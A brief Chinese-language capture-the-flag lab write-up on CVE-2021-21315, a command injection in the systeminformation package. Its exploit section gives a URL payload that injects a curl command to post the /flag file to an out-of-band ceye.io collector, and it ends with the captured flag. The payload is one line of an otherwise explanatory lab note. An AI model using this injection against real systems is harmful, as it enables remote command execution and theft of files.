春秋云鏡 CVE-2021-21315 systeminformation存在命令注入

靶標介紹

systeminformation是一個簡單的查詢系統和OS信息包。

啟動場景

漏洞利用

exp

/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxx.ceye.io)

登錄ceye.io平臺，curl請求
http://eci-2zed871sr7xrdjb7q96l.cloudeci1.ichunqiu.com:8080/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxxx.ceye.io)

查看HTTP請求, record刷新一下

得到flag

flag{94ffcf51-fdea-43e6-b60f-71dcf8cc04cb}